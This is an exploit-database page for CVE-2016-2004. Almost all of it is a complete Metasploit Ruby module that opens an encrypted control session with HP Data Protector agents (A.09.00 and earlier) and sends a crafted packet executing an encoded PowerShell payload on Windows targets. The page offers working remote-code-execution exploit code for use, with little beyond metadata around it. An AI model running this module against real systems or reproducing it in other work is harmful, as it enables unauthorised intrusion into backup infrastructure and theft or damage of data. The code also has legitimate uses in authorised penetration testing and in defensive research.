HP Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (msf)



EKU-ID: 5574 CVE: 2016-2004 OSVDB-ID:
Author: Ian Lovering Published: 2016-06-01 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# Exploit Title: Data Protector Encrypted Communications
# Date: 26-05-2016
# Exploit Author: Ian Lovering
# Vendor Homepage: http://www8.hp.com/uk/en/software-solutions/data-protector-backup-recovery-software/
# Version: A.09.00 and earlier
# Tested on: Windows Server 2008
# CVE : CVE-2016-2004
#
 
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
require 'msf/core/exploit/powershell'
 
require 'openssl'
 
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Powershell
 
  def initialize(info={})
    super(update_info(info,
      'Name'           => "HP Data Protector Encrypted Communication Remote Command Execution",
      'Description'    => %q{
        This module exploits a well known remote code exection exploit after establishing encrypted control communications with a Data Protector agent. This allows exploitation of Data Protector agents that have been configured to only use encrypted control communications. This exploit works by executing the payload with Microsoft PowerShell so will only work against Windows Vista or newer. Tested against Data Protector 9.0 installed on Windows Server 2008 R2."
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'Ian Lovering' ],
      'References'     =>
        [
          [ 'CVE', '2016-2004' ],
        ],
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X86_64 ] } ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00"
        },
      'DefaultOptions'  =>
        {
          'WfsDelay' => 30,
          'RPORT' => 5555
        },
      'Privileged'     => false,
      'DisclosureDate' => "Apr 18 2016",
      'DefaultTarget'  => 0))
  end
 
  def check
    # For the check command
    connect
    sock.put(rand_text_alpha_upper(64))
    response = sock.get_once(-1)
    disconnect
 
    if response.nil?
      return Exploit::CheckCode::Safe
    end
 
    service_version = Rex::Text.to_ascii(response).chop.chomp
 
    if service_version =~ /HP Data Protector/
      print_status(service_version)
      return Exploit::CheckCode::Detected
    end
 
    Exploit::CheckCode::Safe
 
  end
 
  def generate_dp_payload
 
    command = cmd_psh_payload(
      payload.encoded,
      payload_instance.arch.first,
      { remove_comspec: true, encode_final_payload: true })
 
    payload =
      "\x32\x00\x01\x01\x01\x01\x01\x01" +
      "\x00\x01\x00\x01\x00\x01\x00\x01" +
      "\x01\x00\x20\x32\x38\x00\x5c\x70" +
      "\x65\x72\x6c\x2e\x65\x78\x65\x00" +
      "\x20\x2d\x65\x73\x79\x73\x74\x65" +
      "\x6d('#{command}')\x00"
 
    payload_length = [payload.length].pack('N')
 
    return payload_length + payload
  end
 
  def exploit
    # Main function
    encryption_init_data =
      "\x00\x00\x00\x48\xff\xfe\x32\x00\x36\x00\x37\x00\x00\x00\x20\x00" +
      "\x31\x00\x30\x00\x00\x00\x20\x00\x31\x00\x30\x00\x30\x00\x00\x00" +
      "\x20\x00\x39\x00\x30\x00\x30\x00\x00\x00\x20\x00\x38\x00\x38\x00" +
      "\x00\x00\x20\x00\x6f\x00\x6d\x00\x6e\x00\x69\x00\x64\x00\x6c\x00" +
      "\x63\x00\x00\x00\x20\x00\x34\x00\x00\x00\x00\x00"
 
    print_status("Initiating connection")
 
    # Open connection
    connect
 
    # Send init data
    sock.put(encryption_init_data)
    begin
      buf = sock.get_once
    rescue ::EOFError
    end
 
    print_status("Establishing encrypted channel")
 
    # Create TLS / SSL context
    sock.extend(Rex::Socket::SslTcp)
    sock.sslctx  = OpenSSL::SSL::SSLContext.new(:SSLv23)
    sock.sslctx.verify_mode = OpenSSL::SSL::VERIFY_NONE
 
    sock.sslctx.options = OpenSSL::SSL::OP_ALL
 
    # Enable TLS / SSL
    sock.sslsock = OpenSSL::SSL::SSLSocket.new(sock, sock.sslctx)
    sock.sslsock.connect
 
    print_status("Sending payload")
 
    # Send payload
    sock.put(generate_dp_payload(), {timeout: 5})
 
    # Close socket
    disconnect
 
    print_status("Waiting for payload execution (this can take up to 30 seconds or so)")
  end
 
end